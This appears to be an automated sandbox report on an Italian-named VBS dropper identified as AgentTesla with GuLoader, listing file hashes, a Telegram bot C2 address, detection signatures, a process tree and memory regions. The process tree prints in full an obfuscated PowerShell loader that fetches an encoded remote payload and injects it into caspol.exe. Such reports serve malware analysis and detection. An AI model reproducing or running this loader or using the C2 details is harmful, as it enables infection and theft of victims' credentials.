Analysis

  • max time kernel
    153s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-02-2023 10:16

General

  • Target

    Articoli richiesti.vbs

  • Size

    53KB

  • MD5

    68a4d5e4c541961d428996136e9739aa

  • SHA1

    ac722c0b712636eb7efbd995035dd149311e0ee9

  • SHA256

    0dadaf0eb1832bfa87259ffa7481ab5cfdd40455dd6643858f856afceaf17c14

  • SHA512

    379d322247d03e9826ff4bc0de5a849da314f8631b59f0ccf36949e98999f11b84ad564f84e7497755eb333aa0c82381e844a16f6fc533fcec86ddb710e6d517

  • SSDEEP

    1536:Y7ApYVwpqGY8n/pevDkFwjYkRaSQSAykbhATO4RWKIRJRa:Y7ApYVIsvDkajJUSaxF4Rj2fa

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot5693068931:AAGSQSNIWDJM1FzeZVNHS020I9wVBrQdkRM/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 3 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Articoli richiesti.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c echo off
      2⤵
        PID:4224
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c echo rshell
        2⤵
          PID:4012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Illuminist = """Function Endpaper2211 { param([String]`$Bissedesty); `$Tryk = ''; Write-Host `$Tryk; Write-Host `$Tryk; Write-Host `$Tryk; `$Bollen = New-Object byte[] (`$Bissedesty.Length / 2); For(`$blemos=0; `$blemos -lt `$Bissedesty.Length; `$blemos+=2){ `$Bollen[`$blemos/2] = [convert]::ToByte(`$Bissedesty.Substring(`$blemos, 2), 16); `$Afri = (`$Bollen[`$blemos/2] -bxor 116); `$Bollen[`$blemos/2] = `$Afri; } [String][System.Text.Encoding]::ASCII.GetString(`$Bollen);}`$Prog0=Endpaper2211 '270D070011195A101818';`$Prog1=Endpaper2211 '391D17061B071B12005A231D1A47465A211A071512113A15001D02113911001C1B1007';`$Prog2=Endpaper2211 '33110024061B1735101006110707';`$Prog3=Endpaper2211 '270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112';`$Prog4=Endpaper2211 '0700061D1A13';`$Prog5=Endpaper2211 '331100391B100118113C151A101811';`$Prog6=Endpaper2211 '2620270411171D15183A15191158543C1D1011360D271D135854240116181D17';`$Prog7=Endpaper2211 '26011A001D1911585439151A15131110';`$Prog8=Endpaper2211 '2611121811170011103011181113150011';`$Prog9=Endpaper2211 '3D1A3911191B060D391B10011811';`$Overnou0=Endpaper2211 '390D3011181113150011200D0411';`$Overnou1=Endpaper2211 '37181507075854240116181D1758542711151811105854351A071D371815070758543501001B3718150707';`$Overnou2=Endpaper2211 '3D1A021B1F11';`$Overnou3=Endpaper2211 '240116181D1758543C1D1011360D271D1358543A110327181B005854221D0600011518';`$Overnou4=Endpaper2211 '221D06000115183518181B17';`$Overnou5=Endpaper2211 '1A00101818';`$Overnou6=Endpaper2211 '3A0024061B00111700221D06000115183911191B060D';`$Overnou7=Endpaper2211 '3D312C';`$Overnou8=Endpaper2211 '28';`$Skaaltal=Endpaper2211 '212731264746';`$telefonk=Endpaper2211 '37151818231D1A101B0324061B1735';function fkp {Param (`$Udst, `$Tractorske13) ;`$Journeycak0 =Endpaper2211 '503D1A10065449545C2F350404301B19151D1A294E4E37010606111A00301B19151D1A5A331100350707111916181D11075C5D540854231C110611593B161E111700540F54502B5A33181B161518350707111916180D3715171C115459351A1054502B5A381B1715001D1B1A5A2704181D005C503B0211061A1B014C5D2F5945295A3105011518075C5024061B13445D54095D5A331100200D04115C5024061B13455D';.(`$Overnou7) `$Journeycak0;`$Journeycak5 = Endpaper2211 '502D1A131811100D1300544954503D1A10065A3311003911001C1B105C5024061B134658542F200D04112F292954345C5024061B134758545024061B13405D5D';.(`$Overnou7) `$Journeycak5;`$Journeycak1 = Endpaper2211 '06110001061A54502D1A131811100D13005A3D1A021B1F115C501A0118185854345C2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112295C3A1103593B161E11170054270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A1018112611125C5C3A1103593B161E111700543D1A002400065D58545C503D1A10065A3311003911001C1B105C5024061B13415D5D5A3D1A021B1F115C501A0118185854345C50211007005D5D5D5D58545020061517001B06071F1145475D5D';.(`$Overnou7) `$Journeycak1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Ullagoneae,[Parameter(Position = 1)] [Type] `$Cavourshin = [Void]);`$Journeycak2 = Endpaper2211 '50191507001B105449542F350404301B19151D1A294E4E37010606111A00301B19151D1A5A3011121D1A11300D1A15191D17350707111916180D5C5C3A1103593B161E11170054270D070011195A261112181117001D1B1A5A350707111916180D3A1519115C5024061B134C5D5D58542F270D070011195A261112181117001D1B1A5A31191D005A350707111916180D36011D18101106351717110707294E4E26011A5D5A3011121D1A11300D1A15191D17391B100118115C5024061B134D58545012151807115D5A3011121D1A11200D04115C503B0211061A1B01445854503B0211061A1B014558542F270D070011195A390118001D171507003011181113150011295D';.(`$Overnou7) `$Journeycak2;`$Journeycak3 = Endpaper2211 '50191507001B105A3011121D1A11371B1A0700060117001B065C5024061B134258542F270D070011195A261112181117001D1B1A5A371518181D1A13371B1A02111A001D1B1A07294E4E2700151A1015061058545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.(`$Overnou7) `$Journeycak3;`$Journeycak4 = Endpaper2211 '50191507001B105A3011121D1A113911001C1B105C503B0211061A1B01465854503B0211061A1B01475854503715021B0106071C1D1A58545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.(`$Overnou7) `$Journeycak4;`$Journeycak5 = Endpaper2211 '06110001061A5450191507001B105A370611150011200D04115C5D';.(`$Overnou7) `$Journeycak5 ;}`$Prot = Endpaper2211 '1F11061A11184746';`$Endpaper2203 = Endpaper2211 '331100371B1A071B1811231D1A101B03';`$Endpaper2200=Endpaper2211 '271C1B03231D1A101B03';`$Endpaper2201 = Endpaper2211 '50261B181811181D0700114541475449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F1515180015185450311A100415041106464644445D58545C33302054345C2F3D1A002400062958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Endpaper2201;`$Endpaper2202 = Endpaper2211 '5035181811131D151A5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B005450311A100415041106464644475D58545C33302054345C2F3D1A00240006295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Endpaper2202;`$Journeycak7 = Endpaper2211 '5007001E105449545035181811131D151A5A3D1A021B1F115C445D';.(`$Overnou7) `$Journeycak7;`$Journeycak7 = Endpaper2211 '50261B181811181D0700114541475A3D1A021B1F115C5007001E105854445D';.(`$Overnou7) `$Journeycak7;`$Journeycak6 = Endpaper2211 '50241B0401181D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B0054503B0211061A1B01405D58545C33302054345C2F3D1A002400062958542F213D1A0047462958542F213D1A0047462958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Journeycak6;`$Skinli = fkp `$Overnou5 `$Overnou6;`$Journeycak7 = Endpaper2211 '5020061D171C46464D4754495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B585442414C5854440C474444445854440C40445D';.(`$Overnou7) `$Journeycak7;`$Journeycak8 = Endpaper2211 '50391517171B161B54495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B5854454D4D424C4444445854440C474444445854440C405D';.(`$Overnou7) `$Journeycak8;`$Endpaper2201 = Endpaper2211 '1C000004074E5B5B10061D02115A131B1B1318115A171B195B01174B110C041B060049101B031A181B1510521D104945163925042320073C4319423B2227360E0E0C3C1D3825193D392E101519450515';`$Endpaper2200 = Endpaper2211 '503C0118025449545C3A1103593B161E111700543A11005A23111637181D111A005D5A301B031A181B15102700061D1A135C50311A100415041106464644455D';`$Journeycak8 = Endpaper2211 '5020061D171C46464D464950111A024E15040410150015';.(`$Overnou7) `$Journeycak8;`$Trich2292=`$Trich2292+'\Micro.dat';`$Hulv='';if (-not(Test-Path `$Trich2292)) {while (`$Hulv -eq '') {.(`$Overnou7) `$Endpaper2200;Start-Sleep 5;}Set-Content `$Trich2292 `$Hulv;}`$Hulv = Get-Content `$Trich2292;`$Journeycak9 = Endpaper2211 '503E1B01061A110D17151F5449542F270D070011195A371B1A02110600294E4E32061B193615071142402700061D1A135C503C0118025D';.(`$Overnou7) `$Journeycak9;`$Hulv0 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F5854445854545020061D171C46464D47585442414C5D';.(`$Overnou7) `$Hulv0;`$politiks=`$Journeycak.count-658;`$Hulv1 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F585442414C585450391517171B161B585450041B181D001D1F075D';.(`$Overnou7) `$Hulv1;`$Hulv2 = Endpaper2211 '50350718151A00031D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F151518001518545000111811121B1A1F5D58545C33302054345C2F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A00240006295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Hulv2;`$Hulv3 = Endpaper2211 '50350718151A00031D5A3D1A021B1F115C5020061D171C46464D475850391517171B161B5850271F1D1A181D584458445D';.(`$Overnou7) `$Hulv3#;""";Function Hulv9 { param([String]$Bissedesty); For($blemos=0; $blemos -lt $Bissedesty.Length-1; $blemos+=(0+1)){$Endpaper22 = $Endpaper22 + $Bissedesty.Substring($blemos, 1)}; $Endpaper22;}$Jyngine0 = Hulv9 'IEX ';$Jyngine1= Hulv9 $Illuminist;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Jyngine1 ;}else{.$Jyngine0 $Jyngine1;}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1524
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Endpaper2211 { param([String]$Bissedesty); $Tryk = ''; Write-Host $Tryk; Write-Host $Tryk; Write-Host $Tryk; $Bollen = New-Object byte[] ($Bissedesty.Length / 2); For($blemos=0; $blemos -lt $Bissedesty.Length; $blemos+=2){ $Bollen[$blemos/2] = [convert]::ToByte($Bissedesty.Substring($blemos, 2), 16); $Afri = ($Bollen[$blemos/2] -bxor 116); $Bollen[$blemos/2] = $Afri; } [String][System.Text.Encoding]::ASCII.GetString($Bollen);}$Prog0=Endpaper2211 '270D070011195A101818';$Prog1=Endpaper2211 '391D17061B071B12005A231D1A47465A211A071512113A15001D02113911001C1B1007';$Prog2=Endpaper2211 '33110024061B1735101006110707';$Prog3=Endpaper2211 '270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112';$Prog4=Endpaper2211 '0700061D1A13';$Prog5=Endpaper2211 '331100391B100118113C151A101811';$Prog6=Endpaper2211 '2620270411171D15183A15191158543C1D1011360D271D135854240116181D17';$Prog7=Endpaper2211 '26011A001D1911585439151A15131110';$Prog8=Endpaper2211 '2611121811170011103011181113150011';$Prog9=Endpaper2211 '3D1A3911191B060D391B10011811';$Overnou0=Endpaper2211 '390D3011181113150011200D0411';$Overnou1=Endpaper2211 '37181507075854240116181D1758542711151811105854351A071D371815070758543501001B3718150707';$Overnou2=Endpaper2211 '3D1A021B1F11';$Overnou3=Endpaper2211 '240116181D1758543C1D1011360D271D1358543A110327181B005854221D0600011518';$Overnou4=Endpaper2211 '221D06000115183518181B17';$Overnou5=Endpaper2211 '1A00101818';$Overnou6=Endpaper2211 '3A0024061B00111700221D06000115183911191B060D';$Overnou7=Endpaper2211 '3D312C';$Overnou8=Endpaper2211 '28';$Skaaltal=Endpaper2211 '212731264746';$telefonk=Endpaper2211 '37151818231D1A101B0324061B1735';function fkp {Param ($Udst, $Tractorske13) ;$Journeycak0 =Endpaper2211 '503D1A10065449545C2F350404301B19151D1A294E4E37010606111A00301B19151D1A5A331100350707111916181D11075C5D540854231C110611593B161E111700540F54502B5A33181B161518350707111916180D3715171C115459351A1054502B5A381B1715001D1B1A5A2704181D005C503B0211061A1B014C5D2F5945295A3105011518075C5024061B13445D54095D5A331100200D04115C5024061B13455D';.($Overnou7) $Journeycak0;$Journeycak5 = Endpaper2211 '502D1A131811100D1300544954503D1A10065A3311003911001C1B105C5024061B134658542F200D04112F292954345C5024061B134758545024061B13405D5D';.($Overnou7) $Journeycak5;$Journeycak1 = Endpaper2211 '06110001061A54502D1A131811100D13005A3D1A021B1F115C501A0118185854345C2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112295C3A1103593B161E11170054270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A1018112611125C5C3A1103593B161E111700543D1A002400065D58545C503D1A10065A3311003911001C1B105C5024061B13415D5D5A3D1A021B1F115C501A0118185854345C50211007005D5D5D5D58545020061517001B06071F1145475D5D';.($Overnou7) $Journeycak1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ullagoneae,[Parameter(Position = 1)] [Type] $Cavourshin = [Void]);$Journeycak2 = Endpaper2211 '50191507001B105449542F350404301B19151D1A294E4E37010606111A00301B19151D1A5A3011121D1A11300D1A15191D17350707111916180D5C5C3A1103593B161E11170054270D070011195A261112181117001D1B1A5A350707111916180D3A1519115C5024061B134C5D5D58542F270D070011195A261112181117001D1B1A5A31191D005A350707111916180D36011D18101106351717110707294E4E26011A5D5A3011121D1A11300D1A15191D17391B100118115C5024061B134D58545012151807115D5A3011121D1A11200D04115C503B0211061A1B01445854503B0211061A1B014558542F270D070011195A390118001D171507003011181113150011295D';.($Overnou7) $Journeycak2;$Journeycak3 = Endpaper2211 '50191507001B105A3011121D1A11371B1A0700060117001B065C5024061B134258542F270D070011195A261112181117001D1B1A5A371518181D1A13371B1A02111A001D1B1A07294E4E2700151A1015061058545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.($Overnou7) $Journeycak3;$Journeycak4 = Endpaper2211 '50191507001B105A3011121D1A113911001C1B105C503B0211061A1B01465854503B0211061A1B01475854503715021B0106071C1D1A58545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.($Overnou7) $Journeycak4;$Journeycak5 = Endpaper2211 '06110001061A5450191507001B105A370611150011200D04115C5D';.($Overnou7) $Journeycak5 ;}$Prot = Endpaper2211 '1F11061A11184746';$Endpaper2203 = Endpaper2211 '331100371B1A071B1811231D1A101B03';$Endpaper2200=Endpaper2211 '271C1B03231D1A101B03';$Endpaper2201 = Endpaper2211 '50261B181811181D0700114541475449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F1515180015185450311A100415041106464644445D58545C33302054345C2F3D1A002400062958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Endpaper2201;$Endpaper2202 = Endpaper2211 '5035181811131D151A5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B005450311A100415041106464644475D58545C33302054345C2F3D1A00240006295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Endpaper2202;$Journeycak7 = Endpaper2211 '5007001E105449545035181811131D151A5A3D1A021B1F115C445D';.($Overnou7) $Journeycak7;$Journeycak7 = Endpaper2211 '50261B181811181D0700114541475A3D1A021B1F115C5007001E105854445D';.($Overnou7) $Journeycak7;$Journeycak6 = Endpaper2211 '50241B0401181D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B0054503B0211061A1B01405D58545C33302054345C2F3D1A002400062958542F213D1A0047462958542F213D1A0047462958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Journeycak6;$Skinli = fkp $Overnou5 $Overnou6;$Journeycak7 = Endpaper2211 '5020061D171C46464D4754495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B585442414C5854440C474444445854440C40445D';.($Overnou7) $Journeycak7;$Journeycak8 = Endpaper2211 '50391517171B161B54495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B5854454D4D424C4444445854440C474444445854440C405D';.($Overnou7) $Journeycak8;$Endpaper2201 = Endpaper2211 '1C000004074E5B5B10061D02115A131B1B1318115A171B195B01174B110C041B060049101B031A181B1510521D104945163925042320073C4319423B2227360E0E0C3C1D3825193D392E101519450515';$Endpaper2200 = Endpaper2211 '503C0118025449545C3A1103593B161E111700543A11005A23111637181D111A005D5A301B031A181B15102700061D1A135C50311A100415041106464644455D';$Journeycak8 = Endpaper2211 '5020061D171C46464D464950111A024E15040410150015';.($Overnou7) $Journeycak8;$Trich2292=$Trich2292+'\Micro.dat';$Hulv='';if (-not(Test-Path $Trich2292)) {while ($Hulv -eq '') {.($Overnou7) $Endpaper2200;Start-Sleep 5;}Set-Content $Trich2292 $Hulv;}$Hulv = Get-Content $Trich2292;$Journeycak9 = Endpaper2211 '503E1B01061A110D17151F5449542F270D070011195A371B1A02110600294E4E32061B193615071142402700061D1A135C503C0118025D';.($Overnou7) $Journeycak9;$Hulv0 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F5854445854545020061D171C46464D47585442414C5D';.($Overnou7) $Hulv0;$politiks=$Journeycak.count-658;$Hulv1 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F585442414C585450391517171B161B585450041B181D001D1F075D';.($Overnou7) $Hulv1;$Hulv2 = Endpaper2211 '50350718151A00031D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F151518001518545000111811121B1A1F5D58545C33302054345C2F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A00240006295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Hulv2;$Hulv3 = Endpaper2211 '50350718151A00031D5A3D1A021B1F115C5020061D171C46464D475850391517171B161B5850271F1D1A181D584458445D';.($Overnou7) $Hulv3#"
            3⤵
            • Blocklisted process makes network request
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
                PID:3792
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
                4⤵
                  PID:1816
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
                  4⤵
                  • Checks QEMU agent file
                  • Suspicious use of NtCreateThreadExHideFromDebugger
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4528
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 2196
                    5⤵
                    • Program crash
                    PID:1404
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4528 -ip 4528
            1⤵
              PID:2968

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1524-140-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp
              Filesize

              10.8MB

            • memory/1524-134-0x0000000000000000-mapping.dmp
            • memory/1524-135-0x00000144DFF90000-0x00000144DFFB2000-memory.dmp
              Filesize

              136KB

            • memory/1524-136-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp
              Filesize

              10.8MB

            • memory/1524-166-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp
              Filesize

              10.8MB

            • memory/4012-133-0x0000000000000000-mapping.dmp
            • memory/4224-132-0x0000000000000000-mapping.dmp
            • memory/4512-150-0x00000000084D0000-0x00000000097DB000-memory.dmp
              Filesize

              19.0MB

            • memory/4512-148-0x00000000077D0000-0x00000000077F2000-memory.dmp
              Filesize

              136KB

            • memory/4512-141-0x0000000005570000-0x0000000005592000-memory.dmp
              Filesize

              136KB

            • memory/4512-142-0x0000000005E50000-0x0000000005EB6000-memory.dmp
              Filesize

              408KB

            • memory/4512-143-0x0000000005EC0000-0x0000000005F26000-memory.dmp
              Filesize

              408KB

            • memory/4512-144-0x00000000064F0000-0x000000000650E000-memory.dmp
              Filesize

              120KB

            • memory/4512-145-0x0000000007E50000-0x00000000084CA000-memory.dmp
              Filesize

              6.5MB

            • memory/4512-146-0x0000000006AD0000-0x0000000006AEA000-memory.dmp
              Filesize

              104KB

            • memory/4512-147-0x0000000007870000-0x0000000007906000-memory.dmp
              Filesize

              600KB

            • memory/4512-165-0x00000000084D0000-0x00000000097DB000-memory.dmp
              Filesize

              19.0MB

            • memory/4512-149-0x0000000009D90000-0x000000000A334000-memory.dmp
              Filesize

              5.6MB

            • memory/4512-138-0x0000000002BC0000-0x0000000002BF6000-memory.dmp
              Filesize

              216KB

            • memory/4512-151-0x00007FFACD530000-0x00007FFACD725000-memory.dmp
              Filesize

              2.0MB

            • memory/4512-152-0x0000000077C50000-0x0000000077DF3000-memory.dmp
              Filesize

              1.6MB

            • memory/4512-153-0x0000000077C50000-0x0000000077DF3000-memory.dmp
              Filesize

              1.6MB

            • memory/4512-139-0x00000000055F0000-0x0000000005C18000-memory.dmp
              Filesize

              6.2MB

            • memory/4512-155-0x0000000077C50000-0x0000000077DF3000-memory.dmp
              Filesize

              1.6MB

            • memory/4512-137-0x0000000000000000-mapping.dmp
            • memory/4528-154-0x0000000000000000-mapping.dmp
            • memory/4528-158-0x0000000077C50000-0x0000000077DF3000-memory.dmp
              Filesize

              1.6MB

            • memory/4528-159-0x0000000077C50000-0x0000000077DF3000-memory.dmp
              Filesize

              1.6MB

            • memory/4528-160-0x0000000001100000-0x000000000240B000-memory.dmp
              Filesize

              19.0MB

            • memory/4528-161-0x0000000000400000-0x000000000062B000-memory.dmp
              Filesize

              2.2MB

            • memory/4528-162-0x0000000000401000-0x000000000062B000-memory.dmp
              Filesize

              2.2MB

            • memory/4528-164-0x0000000000400000-0x0000000000430000-memory.dmp
              Filesize

              192KB

            • memory/4528-157-0x00007FFACD530000-0x00007FFACD725000-memory.dmp
              Filesize

              2.0MB

            • memory/4528-156-0x0000000001100000-0x000000000240B000-memory.dmp
              Filesize

              19.0MB

            • memory/4528-167-0x00007FFACD530000-0x00007FFACD725000-memory.dmp
              Filesize

              2.0MB

            • memory/4528-168-0x0000000077C50000-0x0000000077DF3000-memory.dmp
              Filesize

              1.6MB

            • memory/4528-169-0x0000000021DB0000-0x0000000021E42000-memory.dmp
              Filesize

              584KB

            • memory/4528-170-0x0000000021D80000-0x0000000021D8A000-memory.dmp
              Filesize

              40KB